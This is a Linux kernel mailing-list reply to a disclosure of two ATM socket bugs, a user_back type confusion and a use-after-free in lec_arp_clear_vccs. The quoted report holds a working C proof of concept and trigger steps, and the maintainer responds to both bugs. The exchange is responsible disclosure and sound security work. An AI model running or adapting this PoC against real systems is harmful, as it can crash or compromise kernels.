Re: Two bugs report

Thu, 30 Apr 2020 22:47:13 -0700 

On Mon, Apr 27, 2020 at 6:16 AM Gengming Liu <l.dmxcsn...@gmail.com> wrote:
>
> We found two security bugs in the linux kernel and here's the
> description of the bugs.
>
> 0.Build a testing environment
>   a. Set up Ubuntu 19.04 in Vmware workstation.
>   b. sudo apt install linux-image-5.0.0-21-generic.
>   c. Change the grub default boot entry to 5.0.0-21-generic. (see
> https://askubuntu.com/questions/100232/how-do-i-change-the-grub-boot-order)
> cat /proc/version. If it is as following, it means you succeed.
>
> "Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019"
>
>   d. compile the poc by using gcc.
>   e. Excute poc by "sudo ./poc"
>   f. Use dmesg to check kernel message about crash.
>
> 1.atm_vcc_userback type confusion
>
> atm(AF_ATMSVC) socket's vcc->user_back can be treated as different
> types of structures.
>
> To trigger this bug it requires CAP_NET_ADMIN.(Use sudo ./poc)
>
> The PoC has been tested on Linux 5.0.0-21 with Vmware workstation.
> Proc version is:
> Linux version 5.0.0-21-generic (buildd@lgw01-amd64-036) (gcc version
> 8.3.0 (Ubuntu 8.3.0-6ubuntu1)) #22-Ubuntu SMP Tue Jul 2 13:27:33 UTC
> 2019
>
> Poc:
> #include <linux/socket.h>
> #include <linux/atmdev.h>
> #include <linux/atmarp.h>
> #include <linux/atmlec.h>
> #include <linux/atmsvc.h>
> #include <linux/atmmpc.h>
> #include <linux/atmclip.h>
>
> int main(int argc, char const *argv[])
> {
> int fd;
> fd = socket(0x14,3,0);
> ioctl(fd,0x61d8, 0x17); //ATMMPC_CTRL
>
> unsigned long long arg = 1;
> ioctl(fd, 0x400261f2, &arg ); //ATM_SETBACKEND
> ioctl(fd, 0x61e2, 1 ); //ATMARP_MKIP
>
> char buffer[] =
> "\x21\x26\x27\xc2\xdd\x6e\x1c\x96\x6e\x6b\x1e\xbb\x04\x4f\x0e\x3a\x51\x07\x22\xec\x86\x57";
> setsockopt(fd,0xe0c7, 0x80, buffer,0x16);

What is this setsockopt() for? I don't connect it to user_back.

The ATM code checks for user_back before using, for example,

        if (cmd != ATM_SETBACKEND && atmvcc->push != pppoatm_push)
                return -ENOIOCTLCMD;



>
> return 0;
> }
>
> 2.use-after-free in lec_arp_clear_vccs.
>
> UAF object: struct atm_vcc *vcc
>
> vcc is a atm(AF_ATMSVC) socket.
>
> To trigger this bug:
>
> 1. Create vcc socket #A and #B
> 2. ioctl(ATMLEC_CTRL) to attach #A to lec device.
> 3. ioctl(ATMLEC_DATA) to attach #B to device's priv->lec_arp_empty_ones list
> 4. close socket #B
> 5. close vcc socket #A to call lec_arp_clear_vccs() to trigger UAF

Yeah, good catch. I have a fix for this, will send it out shortly.

Thanks for the report!

Reply via email to